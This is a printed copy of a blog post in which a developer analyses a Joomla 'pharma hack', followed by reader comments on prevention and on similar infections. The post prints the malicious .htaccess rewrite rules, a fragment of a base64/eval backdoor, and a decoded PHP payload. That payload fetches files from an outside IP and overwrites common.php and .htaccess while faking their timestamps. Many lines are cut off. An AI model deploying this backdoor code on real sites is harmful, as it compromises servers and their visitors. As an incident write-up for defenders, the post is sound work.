Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/
Internet Thoughts
One of the more CSI type things I get to do in my job is figure out how servers a uring out why a site was listing Pharmaceuticals in Google results. Ive dealt alot with hacked and compromised servers, but have never come acro Basically, 3 modified files kept appearing on the server, a modified .htaccess file What we discovered was the following in the .htaccess file: 1 2 3 4 5 6 7 8 9 10 11 #Apachesearchqueriesstatisticmodule <IfModulemod_rewrite.c> RewriteEngineOn RewriteCond%{HTTP_USER_AGENT}(google|yahoo|aol|bing|craw RewriteCond%{HTTP_REFERER}(google|aol|yahoo|msn|search| RewriteCond%{REQUEST_URI}/$[OR] RewriteCond%{REQUEST_FILENAME}(shtml|html|htm|php|xml|p RewriteCond%{REQUEST_FILENAME}!common.php RewriteCond%{DOCUMENT_ROOT}/common.phpf RewriteRule^.*$/common.php[L] </IfModule>
What this means is that any search bot will get redirected through common.php. that modified page meta descriptions and titles. This is outlined pretty well here: macy-hack.html. However, we deleted these files and modified the .htaccess file back to its origin big question was how? I did a search through the Joomla source for base64_encode/decode and found or core, but I did find a few that looked a little odd. For example: 1 /**GnPvQdChUa*/if((md5($_REQUEST["img_id"])=="ae6d32585e
Basically what this does is run whatever is passed in the $_REQUEST["mod_co any base64_encoded string will be run as is. At 6:22 on a sunny Saturday morning, I got a notification from one of my monito
1 de 6
08/09/2013 8:21
http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/
back! I checked the logs and sure enough, here is what the request was:
/components/com_users/users.php?img_id=1f3870be274f6c
That param decodes to a lovely PHP script: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 if(extension_loaded("curl" )){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,"http://209.190.20.51/doo curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0(compa curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $door=curl_exec($ch); $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,"http://209.190.20.51/inc curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0(compa curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $inc_code=curl_exec($ch); $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,"http://209.190.20.51/inc curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0(compa curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $inc_ht=curl_exec($ch); }else{ $door=@file_get_contents("http://209.190.20.51/door.t $inc_code=@file_get_contents("http://209.190.20.51/in $inc_ht=@file_get_contents("http://209.190.20.51/incl }if(is_file("/home/user/public_html/index.html")){ $index="/home/user/public_html/index.html"; }if(is_file("/home/user/public_html/index.htm")){ $index="/home/user/public_html/index.htm"; }if(is_file("/home/user/public_html/.htaccess")){ $index="/home/user/public_html/.htaccess"; }if(is_file("/home/user/public_html/favicon.ico")) $index="/home/user/public_html/favicon.ico"; }if(is_file("/home/user/public_html/index.php")){ $index="/home/user/public_html/index.php"; }if(is_file("/home/user/public_html/common.php")){ $index="/home/user/public_html/common.php"; }$time=filemtime($index); $chmod=substr(sprintf("%o",fileperms($index)),4 $chmod=trim($chmod); $chmod=intval($chmod,8); @unlink("/home/user/public_html/common.php"); $fp=fopen("/home/user/public_html/common.php","w"); fputs($fp,$door); fclose($fp); @chmod("/home/user/public_html/common.php",$chmod); touch("/home/user/public_html/common.php",$time); $htaccess=str_replace("#####INCLUDE#####",$inc_ht,$ @unlink("/home/user/public_html/.htaccess"); $fp=fopen("/home/user/public_html/.htaccess","w"); fputs($fp,$htaccess); fclose($fp); @chmod("/home/user/public_html/.htaccess",$chmod); touch("/home/user/public_html/.htaccess",$time );
2 de 6
08/09/2013 8:21
http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/
So there it is, a URL param that runs CURL requests to setup spam files on a s Wanted to record this so that anyone else having this issue has somewhere to lo TTFN.
About these ads
Share this: Like this: Be the first to like this. This entry was posted in Code, Joomla. Bookmark the permalink.
Fac
8 COMMENTS
Hi I have the same on my site.. search for a mod_joomla.php in my case.. Witch is the first file created and what is the best way to prevent this attack? Reply
Change all your FTP, Joomla passwords and I would disable Jumi or Sourcerer Best way to prevent it is to keep Joomla patched and up to date and dont instal of.
3 de 6
08/09/2013 8:21
http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/
Check out the vulnerable extensions list (http://docs.joomla.org/Vulnerable_Exte cure upload form that was included in a page using Jumi. Also, search the source code for any base64_encode() or eval() statements. Reply
Found out that if you rename your admin folder to something other (hasnt shown up after the usual couple of hours at least). Maybe
Found the same hack on a Drupal site. Thanks for your post as it helped us to identify the pro Reply
Looks like this has hit WordPress now, too. Instead of coockies.txt theres a folder called coo new files. After sifting through server logs, I noticed a few hacked files in my wp-themes folde stall-list-table.php and wp-admin/load-styles.php. Hacked files start with <?php and some md running wp-cron.php. I also noticed an empty folder called .logs in my root and wonder if that elsewhere). Thanks for the post, it was a good start. Reply
Ya the site that was originally infected was moved to another webhost and thing Im thinking it has something to do with log files as well, because even after rem file came back. Reply
4 de 6
08/09/2013 8:21
http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/
Reply
I had this same probelm recently and got rid of the three files you mention at the beginning of later it is back. These files no longer exist but the problem is back. Any idea what to look for? I am not nearly as techie with the scripts and looking at logs so some good old fashioned han Many thanks, Houston Reply
LEAVE A REPLY
ABOUT PETER
TWEETS
Serious game of flip cup. #HRCBigDay http://t.co/kAPzyDnNVp 1 week ago HVAC recommendations in Ottawa? Need a new a/c and furnace. 1 month ago I don't know how I have not been using curl to test form submissions for this long. 1 month ago
5 de 6
08/09/2013 8:21
http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/
I've just taken the WordPress 2013 User and Developer Survey, have you? wp-survey.polldaddy.com/s/wp July the 4th be with youhuh? 2 months ago
Follow @petetasker
RECENT POSTS
2012 in review Facebook JS SDK API Post Image to Feed Facebook Set Auto Grow A version that actually works Joomla Pharma Hack WordPress pagination on custom posts
CATEGORIES
Code Facebook General Joomla WordPress WordPress VIP
6 de 6
08/09/2013 8:21